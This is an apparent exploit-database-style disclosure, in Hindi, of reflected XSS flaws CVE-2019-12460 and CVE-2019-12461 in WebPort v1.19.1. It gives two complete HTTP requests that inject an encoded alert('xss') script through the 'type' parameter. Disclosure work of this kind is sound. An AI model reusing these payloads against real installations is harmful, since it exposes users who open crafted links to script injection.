
CVE-2019-12460|WebPort-v1.19.1 में Reflected XSS उन उपयोगकर्ताओं को प्रभावित करता है जो दुर्भावनापूर्ण रूप से तैयार किए गए लिंक या तृतीय-पक्ष वेब पेज को खोलते हैं।
परावर्तित XSS WebPort-v1.19.1 में उन उपयोगकर्ताओं को प्रभावित करता है जो दुर्भावनापूर्ण रूप से तैयार किए गए लिंक या तीसरे पक्ष के वेब पेज को खोलते हैं।
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
भेद्यता का शोषण करने के लिए, कोई व्यक्ति 'http://[server]:8090/access/setup?type=" अनुरोध का उपयोग कर सकता है ताकि उन उपयोगकर्ताओं को प्रभावित किया जा सके जो दुर्भावनापूर्ण रूप से तैयार किए गए लिंक या तीसरे पक्ष के वेब पेज को खोलते हैं।
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
भेद्यता का शोषण करने के लिए, कोई व्यक्ति 'http://[server]:8090/log?type=" अनुरोध का उपयोग कर सकता है ताकि उन उपयोगकर्ताओं को प्रभावित किया जा सके जो दुर्भावनापूर्ण रूप से तैयार किए गए लिंक या तीसरे पक्ष के वेब पेज को खोलते हैं।
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
